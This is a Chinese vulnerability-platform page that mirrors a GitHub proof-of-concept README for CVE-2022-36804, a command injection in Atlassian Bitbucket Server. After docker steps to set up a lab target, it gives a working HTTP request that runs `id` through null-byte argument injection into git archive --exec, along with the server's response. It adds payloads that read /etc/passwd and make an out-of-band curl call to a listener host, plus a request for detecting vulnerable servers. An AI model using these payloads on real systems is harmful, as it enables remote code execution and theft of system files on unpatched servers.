漏洞平台

POC详情： 569c7be631ba446b6c437e81cd75a8ba33075e7c

来源

https://github.com/ColdFusionX/CVE-2022-36804

关联漏洞

标题： Atlassian Bitbucket Server 安全漏洞 (CVE-2022-36804)
描述：Atlassian Bitbucket Server是澳大利亚Atlassian公司的一款Git代码托管解决方案。该方案能够管理并审查代码，具有差异视图、JIRA集成和构建集成等功能。 Atlassian Bitbucket Server and Data Center存在安全漏洞，该漏洞源于允许对公共或私有Bitbucket库有读取权限的远程攻击者通过发送恶意的HTTP请求执行任意代码。以下产品及版本受到影响：7.0.0 至 7.6.17 之前版本，7.7.0 至 7.17.10 之前版本，7.18.0

描述

Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

介绍

# CVE-2022-36804
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

> In affected versions of Atlassian Bitbucket Server and Data Center a Command Injection Vulnerability exists in multiple API endpoints where an attacker with access to a public repository or with read permissions to a private Bitbucket repository can execute arbitrary code by sending a malicious HTTP request.

### Vulnerable Target Setup

```shell
docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11

docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
```
- Create new PROJECT named `CFX` and a repository named `lord` and make it public, You can use any name for the project and repository.
- URL to list public repositories `Curl http://127.0.0.1:7990/rest/api/latest/repos`

### POC

#### REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```
#### RESPONSE
```
HTTP/1.1 500 
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380

{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}
```

### Additional Payloads

- Reading `/etc/passwd` 
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
```
- OOB Test, Replace `http://example.com` with Burp collab URL or NC listener
```shell
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/
```

#### Basic Check to find vulnerable server

REQUEST
```
GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2
```

RESPONSE
```
HTTP/1.1 200 
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT

usage: git archive [<options>] <tree-ish> [<path>...]
   or: git archive --list
   or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
   or: git archive --remote <repo> [--exec <cmd>] --list

    --format <fmt>        archive format
    --prefix <prefix>     prepend prefix to each pathname in the archive
    -o, --output <file>   write the archive to this file
    --worktree-attributes
                          read .gitattributes in working directory
    -v, --verbose         report archived files on stderr
    -0                    store only
    -1                    compress faster
    -9                    compress better

    -l, --list            list supported archive formats

    --remote <repo>       retrieve the archive from remote repository <repo>
    --exec <command>      path to the remote git-upload-archive command

```

文件快照


 [4.0K]  /data/pocs/569c7be631ba446b6c437e81cd75a8ba33075e7c
├── [1.0K]  LICENSE
└── [4.4K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。